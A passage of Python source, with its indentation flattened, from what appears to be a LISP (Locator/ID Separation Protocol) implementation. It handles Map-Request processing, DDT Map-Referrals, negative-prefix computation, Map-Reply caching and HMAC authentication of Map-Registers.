# Force TTL if configured. To denote seconds in TTL field of EID-record
# set high-order bit in ttl value.
#
if (site_eid.force_ttl != None):
ttl = site_eid.force_ttl | 0x80000000
#endif
#
# Does policy say what the ttl should be? And if we should drop the
# Map-Request and return a negative Map-Reply
#
if (policy):
if (policy.set_record_ttl):
ttl = policy.set_record_ttl
lprint("Policy set-record-ttl to {}".format(ttl))
#endif
if (policy.set_action == "drop"):
lprint("Policy set-action drop, send negative Map-Reply")
action = LISP_POLICY_DENIED_ACTION
rloc_set = []
else:
rloc = policy.set_policy_map_reply()
if (rloc): rloc_set = [rloc]
#endif
#endif
if (policy_drop):
lprint("Implied drop action, send negative Map-Reply")
action = LISP_POLICY_DENIED_ACTION
rloc_set = []
#endif
enc = site_eid.echo_nonce_capable
#
# Don't tell spoofer any prefix information about the target EID.
#
if (sig_good):
reply_eid = site_eid.eid
reply_group = site_eid.group
else:
reply_eid = eid
reply_group = group
action = LISP_AUTH_FAILURE_ACTION
rloc_set = []
#endif
#
# When replying to a subscribe-request, return target EID and not
# maybe shorter matched EID-prefix regitered.
#
if (pubsub):
reply_eid = eid
reply_group = group
#endif
#
# If this Map-Request is also a subscription request, return same
# information in a Map-Notify.
#
packet = lisp_build_map_reply(reply_eid, reply_group, rloc_set,
nonce, action, ttl, map_request, None, enc, False)
if (pubsub):
lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc,
mr_sport, nonce, ttl, xtr_id)
else:
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, mr_sport)
#endif
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#endif
#
# If there are no registered RLOCs, return.
#
rloc_count = len(site_eid.registered_rlocs)
if (rloc_count == 0):
lprint(("Requested EID {} found site '{}' with EID-prefix {} with " + \
"no registered RLOCs").format(green(eid_str, False), site_name,
green(prefix_str, False)))
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#endif
#
# Forward to ETR at registered site. We have to put in an ECM.
#
hash_address = map_request.target_eid if map_request.source_eid.is_null() \
else map_request.source_eid
hashval = map_request.target_eid.hash_address(hash_address)
hashval %= rloc_count
etr = site_eid.registered_rlocs[hashval]
if (etr.rloc.is_null()):
lprint(("Suppress forwarding Map-Request for EID {} at site '{}' " + \
"EID-prefix {}, no RLOC address").format(green(eid_str, False),
site_name, green(prefix_str, False)))
else:
lprint(("Forwarding Map-Request for EID {} to ETR {} at site '{}' " + \
"EID-prefix {}").format(green(eid_str, False),
red(etr.rloc.print_address(), False), site_name,
green(prefix_str, False)))
#
# Send ECM.
#
lisp_send_ecm(lisp_sockets, packet, map_request.source_eid, mr_sport,
map_request.target_eid, etr.rloc, to_etr=True)
#endif
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#enddef
#
# lisp_ddt_process_map_request
#
# Do DDT-node processing of a Map-Request received from an Map-Resolver.
#
def lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source, port):
#
# Lookup target EID address in DDT cache.
#
eid = map_request.target_eid
group = map_request.target_group
eid_str = lisp_print_eid_tuple(eid, group)
nonce = map_request.nonce
action = LISP_DDT_ACTION_NULL
#
# First check to see if EID is registered locally if we are a Map-Server.
# Otherwise, do DDT lookup.
#
ddt_entry = None
if (lisp_i_am_ms):
site_eid = lisp_site_eid_lookup(eid, group, False)
if (site_eid == None): return
if (site_eid.registered):
action = LISP_DDT_ACTION_MS_ACK
ttl = 1440
else:
eid, group, action = lisp_ms_compute_neg_prefix(eid, group)
action = LISP_DDT_ACTION_MS_NOT_REG
ttl = 1
#endif
else:
ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
if (ddt_entry == None):
action = LISP_DDT_ACTION_NOT_AUTH
ttl = 0
lprint("DDT delegation entry not found for EID {}".format( \
green(eid_str, False)))
elif (ddt_entry.is_auth_prefix()):
#
# Check auth-prefix. That means there are no referrals.
#
action = LISP_DDT_ACTION_DELEGATION_HOLE
ttl = 15
ddt_entry_str = ddt_entry.print_eid_tuple()
lprint(("DDT delegation entry not found but auth-prefix {} " + \
"found for EID {}").format(ddt_entry_str,
green(eid_str, False)))
if (group.is_null()):
eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
lisp_ddt_cache)
else:
group = lisp_ddt_compute_neg_prefix(group, ddt_entry,
lisp_ddt_cache)
eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
ddt_entry.source_cache)
#endif
ddt_entry = None
else:
ddt_entry_str = ddt_entry.print_eid_tuple()
lprint("DDT delegation entry {} found for EID {}".format( \
ddt_entry_str, green(eid_str, False)))
ttl = 1440
#endif
#endif
#
# Build and return a Map-Referral message to the source of the Map-Request.
#
packet = lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce)
nonce = map_request.nonce >> 32
if (map_request.nonce != 0 and nonce != 0xdfdf0e1d): port = LISP_CTRL_PORT
lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
return
#enddef
#
# lisp_find_negative_mask_len
#
# XOR the two addresses so we can find the first bit that is different. Then
# count the number of bits from the left that bit position is. That is the
# new mask-length. Compare to the neg-prefix mask-length we have found so
# far. If the new one is longer than the stored one so far, replace it.
#
# This function assumes the address size and the address-family are the same
# for 'eid' and 'entry_prefix'. Caller must make sure of that.
#
def lisp_find_negative_mask_len(eid, entry_prefix, neg_prefix):
diff_address = eid.hash_address(entry_prefix)
address_size = eid.addr_length() * 8
mask_len = 0
#
# The first set bit is the one that is different.
#
for mask_len in range(address_size):
bit_test = 1 << (address_size - mask_len - 1)
if (diff_address & bit_test): break
#endfor
if (mask_len > neg_prefix.mask_len): neg_prefix.mask_len = mask_len
return
#enddef
#
# lisp_neg_prefix_walk
#
# Callback routine to decide which prefixes should be considered by function
# lisp_find_negative_mask_len().
#
# 'entry' in this routine could be a lisp_ddt_entry() or a lisp_site_eid().
#
def lisp_neg_prefix_walk(entry, parms):
eid, auth_prefix, neg_prefix = parms
if (auth_prefix == None):
if (entry.eid.instance_id != eid.instance_id):
return([True, parms])
#endif
if (entry.eid.afi != eid.afi): return([True, parms])
else:
if (entry.eid.is_more_specific(auth_prefix) == False):
return([True, parms])
#endif
#endif
#
# Find bits that match.
#
lisp_find_negative_mask_len(eid, entry.eid, neg_prefix)
return([True, parms])
#enddef
#
# lisp_ddt_compute_neg_prefix
#
# Walk the DDT cache to compute the least specific prefix within the auth-
# prefix found.
#
def lisp_ddt_compute_neg_prefix(eid, ddt_entry, cache):
#
# Do not compute negative prefixes for distinguished-names or geo-prefixes.
#
if (eid.is_binary() == False): return(eid)
neg_prefix = lisp_address(eid.afi, "", 0, 0)
neg_prefix.copy_address(eid)
neg_prefix.mask_len = 0
auth_prefix_str = ddt_entry.print_eid_tuple()
auth_prefix = ddt_entry.eid
#
# Walk looking for the shortest prefix that DOES not match any site EIDs
# configured.
#
eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
(eid, auth_prefix, neg_prefix))
#
# Store high-order bits that are covered by the mask-length.
#
neg_prefix.mask_address(neg_prefix.mask_len)
lprint(("Least specific prefix computed from ddt-cache for EID {} " + \
"using auth-prefix {} is {}").format(green(eid.print_address(), False),
auth_prefix_str, neg_prefix.print_prefix()))
return(neg_prefix)
#enddef
#
# lisp_ms_compute_neg_prefix
#
# From the site cache and the DDT cache, compute a negative EID-prefix to not
# be shorter than a configured authoritative-prefix.
#
def lisp_ms_compute_neg_prefix(eid, group):
neg_prefix = lisp_address(eid.afi, "", 0, 0)
neg_prefix.copy_address(eid)
neg_prefix.mask_len = 0
gneg_prefix = lisp_address(group.afi, "", 0, 0)
gneg_prefix.copy_address(group)
gneg_prefix.mask_len = 0
auth_prefix = None
#
# Look for auth-prefix in DDT cache. If not found, we return the host
# based EID in a negative Map-Referral, action non-authoritative.
#
if (group.is_null()):
ddt_entry = lisp_ddt_cache.lookup_cache(eid, False)
if (ddt_entry == None):
neg_prefix.mask_len = neg_prefix.host_mask_len()
gneg_prefix.mask_len = gneg_prefix.host_mask_len()
return([neg_prefix, gneg_prefix, LISP_DDT_ACTION_NOT_AUTH])
#endif
cache = lisp_sites_by_eid
if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.eid
else:
ddt_entry = lisp_ddt_cache.lookup_cache(group, False)
if (ddt_entry == None):
neg_prefix.mask_len = neg_prefix.host_mask_len()
gneg_prefix.mask_len = gneg_prefix.host_mask_len()
return([neg_prefix, gneg_prefix, LISP_DDT_ACTION_NOT_AUTH])
#endif
if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.group
group, auth_prefix, gneg_prefix = lisp_sites_by_eid.walk_cache( \
lisp_neg_prefix_walk, (group, auth_prefix, gneg_prefix))
gneg_prefix.mask_address(gneg_prefix.mask_len)
lprint(("Least specific prefix computed from site-cache for " + \
"group EID {} using auth-prefix {} is {}").format( \
group.print_address(), auth_prefix.print_prefix() if \
(auth_prefix != None) else "'not found'",
gneg_prefix.print_prefix()))
cache = ddt_entry.source_cache
#endif
#
# Return the auth-prefix if we found it in the DDT cache.
#
action = LISP_DDT_ACTION_DELEGATION_HOLE if (auth_prefix != None) else \
LISP_DDT_ACTION_NOT_AUTH
#
# Walk looking for the shortest prefix that DOES not match any site EIDs
# configured.
#
eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
(eid, auth_prefix, neg_prefix))
#
# Store high-order bits that are covered by the mask-length.
#
neg_prefix.mask_address(neg_prefix.mask_len)
lprint(("Least specific prefix computed from site-cache for EID {} " + \
"using auth-prefix {} is {}").format( \
green(eid.print_address(), False),
auth_prefix.print_prefix() if (auth_prefix != None) else \
"'not found'", neg_prefix.print_prefix()))
return([neg_prefix, gneg_prefix, action])
#enddef
#
# lisp_ms_send_map_referral
#
# This function is for a Map-Server to send a Map-Referral to a requesting
# node.
#
def lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source, port,
action, eid_prefix, group_prefix):
eid = map_request.target_eid
group = map_request.target_group
nonce = map_request.nonce
if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
#
# Build Map-Server specific Map-Referral.
#
map_referral = lisp_map_referral()
map_referral.record_count = 1
map_referral.nonce = nonce
packet = map_referral.encode()
map_referral.print_map_referral()
incomplete = False
#
# Figure out what action code, EID-prefix, and ttl to return in the EID-
# record. Temporary return requested prefix until we have lisp_ms_compute_
# neg_prefix() working.
#
if (action == LISP_DDT_ACTION_SITE_NOT_FOUND):
eid_prefix, group_prefix, action = lisp_ms_compute_neg_prefix(eid,
group)
ttl = 15
#endif
if (action == LISP_DDT_ACTION_MS_NOT_REG): ttl = 1
if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
if (action == LISP_DDT_ACTION_DELEGATION_HOLE): ttl = 15
if (action == LISP_DDT_ACTION_NOT_AUTH): ttl = 0
is_ms_peer = False
rloc_count = 0
ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
if (ddt_entry != None):
rloc_count = len(ddt_entry.delegation_set)
is_ms_peer = ddt_entry.is_ms_peer_entry()
ddt_entry.map_referrals_sent += 1
#endif
#
# Conditions when the incomplete bit should be set in the Map-Referral.
#
if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
incomplete = (is_ms_peer == False)
#endif
#
# Store info in EID-record.
#
eid_record = lisp_eid_record()
eid_record.rloc_count = rloc_count
eid_record.authoritative = True
eid_record.action = action
eid_record.ddt_incomplete = incomplete
eid_record.eid = eid_prefix
eid_record.group= group_prefix
eid_record.record_ttl = ttl
packet += eid_record.encode()
eid_record.print_record(" ", True)
#
# Build referral-set.
#
if (rloc_count != 0):
for ddt_node in ddt_entry.delegation_set:
rloc_record = lisp_rloc_record()
rloc_record.rloc = ddt_node.delegate_address
rloc_record.priority = ddt_node.priority
rloc_record.weight = ddt_node.weight
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.reach_bit = True
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
#endif
#
# Build packet and send Map-Referral message to the source of the
# Map-Request.
#
if (map_request.nonce != 0): port = LISP_CTRL_PORT
lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
return
#enddef
#
# lisp_send_negative_map_reply
#
# Send a negative Map-Reply. This is one with a specific action code and zero
# RLOCs in the locator-set.
#
def lisp_send_negative_map_reply(sockets, eid, group, nonce, dest, port, ttl,
xtr_id, pubsub):
lprint("Build negative Map-Reply EID-prefix {}, nonce 0x{} to ITR {}". \
format(lisp_print_eid_tuple(eid, group), lisp_hex_string(nonce),
red(dest.print_address(), False)))
action = LISP_NATIVE_FORWARD_ACTION if group.is_null() else \
LISP_DROP_ACTION
#
# If this is a crypto-EID, return LISP_SEND_MAP_REQUEST_ACTION.
#
if (lisp_get_eid_hash(eid) != None):
action = LISP_SEND_MAP_REQUEST_ACTION
#endif
packet = lisp_build_map_reply(eid, group, [], nonce, action, ttl, None,
None, False, False)
#
# Send Map-Notify if this Map-Request is a subscribe-request.
#
if (pubsub):
lisp_process_pubsub(sockets, packet, eid, dest, port, nonce, ttl,
xtr_id)
else:
lisp_send_map_reply(sockets, packet, dest, port)
#endif
return
#enddef
#
# lisp_retransmit_ddt_map_request
#
# Have the Map-Resolver transmit a DDT Map-Request.
#
def lisp_retransmit_ddt_map_request(mr):
seid_str = mr.mr_source.print_address()
deid_str = mr.print_eid_tuple()
nonce = mr.nonce
#
# Get referral-node for who we sent Map-Request to last time. We need
# to increment, the no-response timer.
#
if (mr.last_request_sent_to):
last_node = mr.last_request_sent_to.print_address()
ref = lisp_referral_cache_lookup(mr.last_cached_prefix[0],
mr.last_cached_prefix[1], True)
if (ref and last_node in ref.referral_set):
ref.referral_set[last_node].no_responses += 1
#endif
#endif
#
# Did we reach the max number of retries? We are giving up since no
# Map-Notify-Acks have been received.
#
if (mr.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
lprint("DDT Map-Request retry limit reached for EID {}, nonce 0x{}". \
format(green(deid_str, False), lisp_hex_string(nonce)))
mr.dequeue_map_request()
return
#endif
mr.retry_count += 1
s = green(seid_str, False)
d = green(deid_str, False)
lprint("Retransmit DDT {} from {}ITR {} EIDs: {} -> {}, nonce 0x{}". \
format(bold("Map-Request", False), "P" if mr.from_pitr else "",
red(mr.itr.print_address(), False), s, d,
lisp_hex_string(nonce)))
#
# Do referral lookup and send the DDT Map-Request again.
#
lisp_send_ddt_map_request(mr, False)
#
# Restart retransmit timer.
#
mr.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
lisp_retransmit_ddt_map_request, [mr])
mr.retransmit_timer.start()
return
#enddef
#
# lisp_get_referral_node
#
# Get a referral-node of highest priority that is in the up state. Returns
# class lisp_referral_node().
#
def lisp_get_referral_node(referral, source_eid, dest_eid):
#
# Build list of high-priority up referral-nodes.
#
ref_set = []
for ref_node in list(referral.referral_set.values()):
if (ref_node.updown == False): continue
if (len(ref_set) == 0 or ref_set[0].priority == ref_node.priority):
ref_set.append(ref_node)
elif (ref_set[0].priority > ref_node.priority):
ref_set = []
ref_set.append(ref_node)
#endif
#endfor
ref_count = len(ref_set)
if (ref_count == 0): return(None)
hashval = dest_eid.hash_address(source_eid)
hashval = hashval % ref_count
return(ref_set[hashval])
#enddef
#
# lisp_send_ddt_map_request
#
# Send a DDT Map-Request based on a EID lookup in the referral cache.
#
def lisp_send_ddt_map_request(mr, send_to_root):
lisp_sockets = mr.lisp_sockets
nonce = mr.nonce
itr = mr.itr
mr_source = mr.mr_source
eid_str = mr.print_eid_tuple()
#
# Check if the maximum allowable Map-Requests have been sent for this
# map-request-queue entry.
#
if (mr.send_count == 8):
lprint("Giving up on map-request-queue entry {}, nonce 0x{}".format( \
green(eid_str, False), lisp_hex_string(nonce)))
mr.dequeue_map_request()
return
#endif
#
# If caller wants us to use the root versus best match lookup. We only
# so this once per Map-Request queue entry.
#
if (send_to_root):
lookup_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
lookup_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
mr.tried_root = True
lprint("Jumping up to root for EID {}".format(green(eid_str, False)))
else:
lookup_eid = mr.eid
lookup_group = mr.group
#endif
#
# Do longest match on EID into DDT referral cache.
#
referral = lisp_referral_cache_lookup(lookup_eid, lookup_group, False)
if (referral == None):
lprint("No referral cache entry found")
lisp_send_negative_map_reply(lisp_sockets, lookup_eid, lookup_group,
nonce, itr, mr.sport, 15, None, False)
return
#endif
ref_str = referral.print_eid_tuple()
lprint("Found referral cache entry {}, referral-type: {}".format(ref_str,
referral.print_referral_type()))
ref_node = lisp_get_referral_node(referral, mr_source, mr.eid)
if (ref_node == None):
lprint("No reachable referral-nodes found")
mr.dequeue_map_request()
lisp_send_negative_map_reply(lisp_sockets, referral.eid,
referral.group, nonce, itr, mr.sport, 1, None, False)
return
#endif
lprint("Send DDT Map-Request to {} {} for EID {}, nonce 0x{}". \
format(ref_node.referral_address.print_address(),
referral.print_referral_type(), green(eid_str, False),
lisp_hex_string(nonce)))
#
# Encapsulate Map-Request and send out.
#
to_ms = (referral.referral_type == LISP_DDT_ACTION_MS_REFERRAL or
referral.referral_type == LISP_DDT_ACTION_MS_ACK)
lisp_send_ecm(lisp_sockets, mr.packet, mr_source, mr.sport, mr.eid,
ref_node.referral_address, to_ms=to_ms, ddt=True)
#
# Do some stats.
#
mr.last_request_sent_to = ref_node.referral_address
mr.last_sent = lisp_get_timestamp()
mr.send_count += 1
ref_node.map_requests_sent += 1
return
#enddef
#
# lisp_mr_process_map_request
#
# Process a Map-Request received by an ITR. We need to forward this Map-Request
# to the longest matched referral from the referral-cache.
#
def lisp_mr_process_map_request(lisp_sockets, packet, map_request, ecm_source,
sport, mr_source):
eid = map_request.target_eid
group = map_request.target_group
deid_str = map_request.print_eid_tuple()
seid_str = mr_source.print_address()
nonce = map_request.nonce
s = green(seid_str, False)
d = green(deid_str, False)
lprint("Received Map-Request from {}ITR {} EIDs: {} -> {}, nonce 0x{}". \
format("P" if map_request.pitr_bit else "",
red(ecm_source.print_address(), False), s, d,
lisp_hex_string(nonce)))
#
# Queue the Map-Request. We need to reliably transmit it.
#
mr = lisp_ddt_map_request(lisp_sockets, packet, eid, group, nonce)
mr.packet = packet
mr.itr = ecm_source
mr.mr_source = mr_source
mr.sport = sport
mr.from_pitr = map_request.pitr_bit
mr.queue_map_request()
lisp_send_ddt_map_request(mr, False)
return
#enddef
#
# lisp_process_map_request
#
# Process received Map-Request as a Map-Server or an ETR.
#
def lisp_process_map_request(lisp_sockets, packet, ecm_source, ecm_port,
mr_source, mr_port, ddt_request, ttl, timestamp):
orig_packet = packet
map_request = lisp_map_request()
packet = map_request.decode(packet, mr_source, mr_port)
if (packet == None):
lprint("Could not decode Map-Request packet")
return
#endif
map_request.print_map_request()
#
# If RLOC-probe request, process separately.
#
if (map_request.rloc_probe):
lisp_process_rloc_probe_request(lisp_sockets, map_request, mr_source,
mr_port, ttl, timestamp)
return
#endif
#
# Process SMR.
#
if (map_request.smr_bit):
lisp_process_smr(map_request)
#endif
#
# Process SMR-invoked Map-Request.
#
if (map_request.smr_invoked_bit):
lisp_process_smr_invoked_request(map_request)
#endif
#
# Do ETR processing of the Map-Request if we found a database-mapping.
#
if (lisp_i_am_etr):
lisp_etr_process_map_request(lisp_sockets, map_request, mr_source,
mr_port, ttl, timestamp)
#endif
#
# Do Map-Server processing of the Map-Request.
#
if (lisp_i_am_ms):
packet = orig_packet
eid, group, ddt_action = lisp_ms_process_map_request(lisp_sockets,
orig_packet, map_request, mr_source, mr_port, ecm_source)
if (ddt_request):
lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source,
ecm_port, ddt_action, eid, group)
#endif
return
#endif
#
# Map-Request is from an ITR destined to a Map-Resolver.
#
if (lisp_i_am_mr and not ddt_request):
lisp_mr_process_map_request(lisp_sockets, orig_packet, map_request,
ecm_source, mr_port, mr_source)
#endif
#
# Do DDT-node processing of the Map-Request.
#
if (lisp_i_am_ddt or ddt_request):
packet = orig_packet
lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source,
ecm_port)
#endif
return
#enddef
#
# lisp_store_mr_stats
#
# Store counter and timing stats for the map-resolver that just sent us a
# negative Map-Reply.
#
def lisp_store_mr_stats(source, nonce):
mr = lisp_get_map_resolver(source, None)
if (mr == None): return
#
# Count and record timestamp.
#
mr.neg_map_replies_received += 1
mr.last_reply = lisp_get_timestamp()
#
# For every 100 replies, reset the total_rtt so we can get a new average.
#
if ((mr.neg_map_replies_received % 100) == 0): mr.total_rtt = 0
#
# If Map-Reply matches stored nonce, then we can do an RTT calculation.
#
if (mr.last_nonce == nonce):
mr.total_rtt += (time.time() - mr.last_used)
mr.last_nonce = 0
#endif
if ((mr.neg_map_replies_received % 10) == 0): mr.last_nonce = 0
return
#enddef
#
# lisp_process_map_reply
#
# Process received Map-Reply.
#
def lisp_process_map_reply(lisp_sockets, packet, source, ttl, itr_in_ts):
global lisp_map_cache
map_reply = lisp_map_reply()
packet = map_reply.decode(packet)
if (packet == None):
lprint("Could not decode Map-Reply packet")
return
#endif
map_reply.print_map_reply()
#
# Process each EID record in Map-Reply message.
#
rloc_key_change = None
for i in range(map_reply.record_count):
eid_record = lisp_eid_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Reply packet")
return
#endif
eid_record.print_record(" ", False)
#
# If negative Map-Reply, see if from a Map-Resolver, do some counting
# and timing stats.
#
if (eid_record.rloc_count == 0):
lisp_store_mr_stats(source, map_reply.nonce)
#endif
multicast = (eid_record.group.is_null() == False)
#
# If this is a (0.0.0.0/0, G) with drop-action, we don't want to
# cache more-specific (S,G) entry. It is a startup timing problem.
#
if (lisp_decent_push_configured):
action = eid_record.action
if (multicast and action == LISP_DROP_ACTION):
if (eid_record.eid.is_local()): continue
#endif
#endif
#
# Some RLOC-probe Map-Replies may have no EID value in the EID-record.
# Like from RTRs or PETRs.
#
if (multicast == False and eid_record.eid.is_null()): continue
#
# Do not lose state for other RLOCs that may be stored in an already
# cached map-cache entry.
#
if (multicast):
mc = lisp_map_cache.lookup_cache(eid_record.group, True)
if (mc):
mc = mc.lookup_source_cache(eid_record.eid, False)
#endif
else:
mc = lisp_map_cache.lookup_cache(eid_record.eid, True)
#endif
new_mc = (mc == None)
#
# Do not let map-cache entries from Map-Replies override gleaned
# entries.
#
if (mc == None):
glean, x, y = lisp_allow_gleaning(eid_record.eid, eid_record.group,
None)
if (glean): continue
else:
if (mc.gleaned): continue
#endif
#
# Process each RLOC record in EID record.
#
rloc_set = []
mrloc = None
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
rloc_record.keys = map_reply.keys
packet = rloc_record.decode(packet, map_reply.nonce)
if (packet == None):
lprint("Could not decode RLOC-record in Map-Reply packet")
return
#endif
rloc_record.print_record(" ")
old_rloc = None
if (mc): old_rloc = mc.get_rloc(rloc_record.rloc)
if (old_rloc):
rloc = old_rloc
else:
rloc = lisp_rloc()
#endif
#
# Copy RLOC data from record, add to locator-set. Check to see
# if the RLOC has been translated by a NAT. If so, go get the
# translated port and store in rloc entry.
#
port = rloc.store_rloc_from_record(rloc_record, map_reply.nonce,
source)
rloc.echo_nonce_capable = map_reply.echo_nonce_capable
if (rloc.echo_nonce_capable):
addr_str = rloc.rloc.print_address_no_iid()
if (lisp_get_echo_nonce(None, addr_str) == None):
lisp_echo_nonce(addr_str)
#endif
#endif
#
# Add itr-in timestamp if telemetry data included in RLOC record..
#
if (rloc.json):
if (lisp_is_json_telemetry(rloc.json.json_string)):
js = rloc.json.json_string
js = lisp_encode_telemetry(js, ii=itr_in_ts)
rloc.json.json_string = js
#endif
#endif
#
# Process state for RLOC-probe reply from this specific RLOC. And
# update RLOC state for map-cache entry. Ignore an RLOC with a
# different address-family of the recieved packet. The ITR really
# doesn't know it can reach the RLOC unless it probes for that
# address-family.
#
if (map_reply.rloc_probe and rloc_record.probe_bit):
if (rloc.rloc.afi == source.afi):
lisp_process_rloc_probe_reply(rloc, source, port,
map_reply, ttl, mrloc)
#endif
if (rloc.rloc.is_multicast_address()): mrloc = rloc
#endif
#
# Append to rloc-set array to be stored in map-cache entry.
#
rloc_set.append(rloc)
#
# Did keys change for thie RLOC, flag it if so.
#
if (lisp_data_plane_security and rloc.rloc_recent_rekey()):
rloc_key_change = rloc
#endif
#endfor
#
# If the map-cache entry is for an xTR behind a NAT, we'll find an
# RTR RLOC (which is priority 254). Store private RLOCs that may
# come along with the RTR RLOC because the destination RLOC could
# be behind the same NAT as this ITR. This ITR, however could be
# behind another NAT or in public space. We want to mark the
# private address RLOC unreachable for the two later cases.
#
if (map_reply.rloc_probe == False and lisp_nat_traversal):
new_set = []
log_set = []
for rloc in rloc_set:
#
# Set initial state for private RLOCs to UNREACH and test
# with RLOC-probes if up behind same NAT.
#
if (rloc.rloc.is_private_address()):
rloc.priority = 1
rloc.state = LISP_RLOC_UNREACH_STATE
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
continue
#endif
#
# RTR should not put RTR RLOC in map-cache. But xTRs do. None
# RTR RLOCs should only go in the RTR map-cache.
#
if (rloc.priority == 254 and lisp_i_am_rtr == False):
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
#endif
if (rloc.priority != 254 and lisp_i_am_rtr):
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
#endif
#endfor
if (log_set != []):
rloc_set = new_set
lprint("NAT-traversal optimized RLOC-set: {}".format(log_set))
#endif
#endif
#
# If any RLOC-records do not have RLOCs, don't put them in the map-
# cache.
#
new_set = []
for rloc in rloc_set:
if (rloc.json != None): continue
new_set.append(rloc)
#endfor
if (new_set != []):
count = len(rloc_set) - len(new_set)
lprint("Pruning {} no-address RLOC-records for map-cache".format( \
count))
rloc_set = new_set
#endif
#
# If this is an RLOC-probe reply and the RLOCs are registered with
# merge semantics, this Map-Reply may not include the other RLOCs.
# In this case, do not wipe out the other RLOCs. Get them from the
# existing entry.
#
if (map_reply.rloc_probe and mc != None): rloc_set = mc.rloc_set
#
# If we are overwriting the rloc-set cached in the map-cache entry,
# then remove the old rloc pointers from the RLOC-probe list.
#
rloc_set_change = new_mc
if (mc and rloc_set != mc.rloc_set):
mc.delete_rlocs_from_rloc_probe_list()
rloc_set_change = True
#endif
#
# Add to map-cache. If this is a replace, save uptime.
#
uptime = mc.uptime if (mc) else None
if (mc == None):
mc = lisp_mapping(eid_record.eid, eid_record.group, rloc_set)
mc.mapping_source = source
#
# If this is a multicast map-cache entry in an RTR, set map-cache
# TTL small so Map-Requests can be sent more often to capture
# RLE changes.
#
if (lisp_i_am_rtr and eid_record.group.is_null() == False):
mc.map_cache_ttl = LISP_MCAST_TTL
else:
mc.map_cache_ttl = eid_record.store_ttl()
#endif
mc.action = eid_record.action
mc.add_cache(rloc_set_change)
#endif
add_or_replace = "Add"
if (uptime):
mc.uptime = uptime
mc.refresh_time = lisp_get_timestamp()
add_or_replace = "Replace"
#endif
lprint("{} {} map-cache with {} RLOCs".format(add_or_replace,
green(mc.print_eid_tuple(), False), len(rloc_set)))
#
# If there were any changes to the RLOC-set or the keys for any
# existing RLOC in the RLOC-set, tell the external data-plane.
#
if (lisp_ipc_dp_socket and rloc_key_change != None):
lisp_write_ipc_keys(rloc_key_change)
#endif
#
# Send RLOC-probe to highest priority RLOCs if this is a new map-cache
# entry. But if any of the RLOCs were used before in other map-cache
# entries, no need to send RLOC-probes.
#
if (new_mc):
probe = bold("RLOC-probe", False)
for rloc in mc.best_rloc_set:
addr_str = red(rloc.rloc.print_address_no_iid(), False)
lprint("Trigger {} to {}".format(probe, addr_str))
lisp_send_map_request(lisp_sockets, 0, mc.eid, mc.group, rloc)
#endfor
#endif
#endfor
return
#enddef
#
# lisp_compute_auth
#
# Create HMAC hash from packet contents store in lisp_map_register() and
# encode in packet buffer.
#
def lisp_compute_auth(packet, map_register, password):
if (map_register.alg_id == LISP_NONE_ALG_ID): return(packet)
packet = map_register.zero_auth(packet)
hashval = lisp_hash_me(packet, map_register.alg_id, password, False)
#
# Store packed hash value in lisp_map_register().
#
map_register.auth_data = hashval
packet = map_register.encode_auth(packet)
return(packet)
#enddef
#
# lisp_hash_me
#
# Call HMAC hashing code from multiple places. Returns hash value.
#
def lisp_hash_me(packet, alg_id, password, do_hex):
if (alg_id == LISP_NONE_ALG_ID): return(True)
if (alg_id == LISP_SHA_1_96_ALG_ID):
hashalg = hashlib.sha1
#endif
if (alg_id == LISP_SHA_256_128_ALG_ID):
hashalg = hashlib.sha256
#endif
if (do_hex):
hashval = hmac.new(password.encode(), packet, hashalg).hexdigest()
else:
hashval = hmac.new(password.encode(), packet, hashalg).digest()
#endif
return(hashval)
#enddef
#
# lisp_verify_auth
#
# Compute sha1 or sha2 hash over Map-Register packet and compare with one
# transmitted in packet that is stored in class lisp_map_register.
#
def lisp_verify_auth(packet, alg_id, auth_data, password):
if (alg_id == LISP_NONE_ALG_ID): return(True)
hashval = lisp_hash_me(packet, alg_id, password, True)
matched = (hashval == auth_data)
#
# Print differences if hashes if they do not match.
#
if (matched == False):
lprint("Hashed value: {} does not match packet value: {}".format( \
hashval, auth_data))
#endif
return(matched)
#enddef
#
# lisp_retransmit_map_notify
#
# Retransmit the already build Map-Notify message.
#
def lisp_retransmit_map_notify(map_notify):
dest = map_notify.etr
port = map_notify.etr_port
#
# Did we reach the max number of retries? We are giving up since no
# Map-Notify-Acks have been received.
#
if (map_notify.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
lprint("Map-Notify with nonce 0x{} retry limit reached for ETR {}". \
format(map_notify.nonce_key, red(dest.print_address(), False)))
